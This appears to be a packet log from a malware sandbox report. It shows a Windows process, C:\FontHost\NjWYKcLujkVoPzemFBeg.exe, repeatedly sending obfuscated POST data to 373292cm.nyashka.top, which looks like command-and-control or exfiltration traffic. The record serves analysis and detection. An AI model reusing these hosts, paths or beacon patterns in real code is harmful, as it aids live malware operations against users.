                              Aug 25, 2024 15:44:08.125281096 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:08.475903988 CEST2504OUTData Raw: 5a 52 59 54 54 47 54 50 5b 5f 5a 51 59 54 58 57 57 5f 5d 5d 57 5b 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZRYTTGTP[_ZQYTXWW_]]W[STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8/@!+7#"==(?("?+V#28+ V=,&F$.Y/)
                              Aug 25, 2024 15:44:08.786588907 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:08.984129906 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              46192.168.2.55990280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:09.128514051 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:09.520967960 CEST2504OUTData Raw: 5a 50 5c 5e 51 45 51 5e 5b 5f 5a 51 59 56 58 55 57 58 5d 5a 57 5d 53 5e 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZP\^QEQ^[_ZQYVXUWX]ZW]S^YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-.#54"3>>7?-_<Y4Z3!!(Q+#^7=\/&F$.Y/!
                              Aug 25, 2024 15:44:09.964683056 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:10.000144958 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              47192.168.2.55990380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:10.238861084 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:10.585462093 CEST2504OUTData Raw: 5f 52 5c 54 51 47 54 5e 5b 5f 5a 51 59 50 58 53 57 5b 5d 5b 57 50 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _R\TQGT^[_ZQYPXSW[][WPSXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.Y, 'B!? 0Y).??)](.#[#+41(S?)_7 _8&F$.Y/
                              Aug 25, 2024 15:44:10.913904905 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:11.114624023 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:10 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              48192.168.2.55990480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:11.246577024 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:11.601012945 CEST2504OUTData Raw: 5f 50 5c 54 54 43 54 51 5b 5f 5a 51 59 56 58 53 57 50 5d 5b 57 5f 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _P\TTCTQ[_ZQYVXSWP][W_S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.\;0#C5=0Y V)==0_<6?;[7</P#20Q?9408>&F$.Y/!


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              49192.168.2.55990580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:11.889693022 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:12.275880098 CEST1808OUTData Raw: 5a 52 5c 5e 54 45 54 5f 5b 5f 5a 51 59 5f 58 57 57 5f 5d 5c 57 5c 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZR\^TET_[_ZQY_XWW_]\W\STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;#A![ 3=*=Y<>)+/Z4Z3Q#<7 0,.&F$.Y/
                              Aug 25, 2024 15:44:12.586159945 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:12.719830990 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 56 3e 0b 36 59 26 5d 2c 54 27 23 3e 55 29 2d 3c 03 3d 3d 03 17 27 3b 25 5e 31 10 0a 57 26 2b 08 04 28 10 00 52 26 3c 20 03 2c 34 2b 5d 0c 13 22 1b 34 03 25 04 26 2c 33 02 29 38 05 5f 36 02 25 04 3f 3a 25 51 28 06 2f 00 2b 00 37 5d 3c 3a 2e 57 3b 06 04 04 2d 1e 2a 57 23 2e 2b 52 0d 11 24 10 3f 3d 21 57 29 3d 2b 1a 36 01 3c 07 27 04 32 1c 31 22 26 55 33 29 02 5b 31 0c 32 0f 25 21 3a 0f 32 5d 29 07 31 01 08 0c 22 18 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &V>6Y&],T'#>U)-<==';%^1W&+(R&< ,4+]"4%&,3)8_6%?:%Q(/+7]<:.W;-*W#.+R$?=!W)=+6<'21"&U3)[12%!:2])1"#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              50192.168.2.55990680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:12.482742071 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:12.835577965 CEST2504OUTData Raw: 5a 55 5c 56 54 47 51 5d 5b 5f 5a 51 59 53 58 57 57 50 5d 5c 57 5b 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZU\VTGQ][_ZQYSXWWP]\W[STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.],,6>#40+.<>>-\?+"?+R#!$Q+)7#/&F$.Y/5
                              Aug 25, 2024 15:44:13.154925108 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:13.281760931 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              51192.168.2.55990780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:13.421926975 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:13.773085117 CEST2504OUTData Raw: 5f 5c 5c 55 54 45 51 5a 5b 5f 5a 51 59 5f 58 51 57 5d 5d 5f 57 5e 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _\\UTEQZ[_ZQY_XQW]]_W^SXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.8#"=^" 1+.4^+*+$#Z+720P(#0)^/>&F$.Y/
                              Aug 25, 2024 15:44:14.157879114 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:14.357908964 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              52192.168.2.55990880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:14.538757086 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:14.903034925 CEST2504OUTData Raw: 5f 56 5c 5e 54 46 51 5e 5b 5f 5a 51 59 5f 58 53 57 5f 5d 59 57 5f 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _V\^TFQ^[_ZQY_XSW_]YW_STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_./?6=70&) ]+>9Z+[;Y"< #*9^"0>8&F$.Y/
                              Aug 25, 2024 15:44:15.205976009 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:15.335910082 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:14 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              53192.168.2.55990980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:15.466371059 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:15.819952965 CEST2504OUTData Raw: 5a 50 59 54 54 42 54 58 5b 5f 5a 51 59 54 58 5f 57 51 5d 53 57 5d 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZPYTTBTX[_ZQYTX_WQ]SW]SUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;'A!$Y# >+=(>+.8 ,S#<*:'_409_,.&F$.Y/)
                              Aug 25, 2024 15:44:16.128299952 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:16.515790939 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[
                              Aug 25, 2024 15:44:16.559216022 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              54192.168.2.55991080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:16.651532888 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:17.007065058 CEST2500OUTData Raw: 5f 51 59 54 54 47 54 50 5b 5f 5a 51 59 57 58 50 57 5e 5d 5b 57 51 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _QYTTGTP[_ZQYWXPW^][WQSYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,;C!0_#0+-?>>\+=+"<< (Q<?79.>&F$.Y/
                              Aug 25, 2024 15:44:17.343898058 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:17.543200016 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:16 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              55192.168.2.55991180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:17.700139046 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:18.053955078 CEST2504OUTData Raw: 5f 55 59 50 51 45 54 5d 5b 5f 5a 51 59 51 58 54 57 5c 5d 5c 57 5e 53 5e 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _UYPQET][_ZQYQXTW\]\W^S^YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-. #A5; 6*[+<.!Z<>;\#Z3Q 2,Q? >8>&F$.Y/=
                              Aug 25, 2024 15:44:18.364190102 CEST25INHTTP/1.1 100 Continue


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              56192.168.2.55991280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:17.735656977 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:18.085160017 CEST1828OUTData Raw: 5a 51 5c 56 51 43 51 5a 5b 5f 5a 51 59 5f 58 57 57 5c 5d 52 57 5d 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQ\VQCQZ[_ZQY_XWW\]RW]SUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.X/03E5=+ !Y>4Y?!(#Y ,#Q 3( 7#%..&F$.Y/
                              Aug 25, 2024 15:44:18.402592897 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:18.534056902 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 52 3e 0b 26 59 31 38 3f 0d 24 1d 3e 55 3d 13 2b 5f 29 5b 2a 06 33 06 25 17 31 3d 30 55 27 38 31 12 3c 3d 2d 0a 24 2c 2f 11 2c 24 2b 5d 0c 13 21 05 37 03 3a 11 31 3c 09 03 3e 28 0d 5a 35 2c 36 58 2b 03 21 50 3e 3f 27 02 3f 00 37 11 2b 3a 32 1c 2e 2b 36 07 3a 09 31 0f 20 3e 2b 52 0d 11 24 52 3f 3e 31 1f 3d 2d 37 5c 21 5e 3f 5f 30 3d 0f 09 32 0c 26 1e 24 17 27 04 32 31 39 57 25 21 0f 54 25 2b 3d 06 31 59 39 12 22 22 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &R>&Y18?$>U=+_)[*3%1=0U'81<=-$,/,$+]!7:1<>(Z5,6X+!P>?'?7+:2.+6:1 >+R$R?>1=-7\!^?_0=2&$'219W%!T%+=1Y9""#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              57192.168.2.55991380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:18.869560957 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:19.225862980 CEST2504OUTData Raw: 5a 57 5c 54 54 41 54 5d 5b 5f 5a 51 59 55 58 50 57 5e 5d 59 57 5b 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZW\TTAT][_ZQYUXPW^]YW[S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.\/3 #="#)\*-_+.")=7,Q423+#]40,>&F$.Y/-
                              Aug 25, 2024 15:44:19.536700964 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:19.740916967 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:19 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              58192.168.2.55991580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:19.873061895 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:20.297946930 CEST2504OUTData Raw: 5f 56 59 50 51 43 51 5b 5b 5f 5a 51 59 55 58 57 57 50 5d 58 57 5d 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _VYPQCQ[[_ZQYUXWWP]XW]SZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.X;'"8]#=X)7>.Z(.#Y7< 3(Y#*,&F$.Y/-
                              Aug 25, 2024 15:44:20.552195072 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:20.683842897 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              59192.168.2.55991680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:20.806673050 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
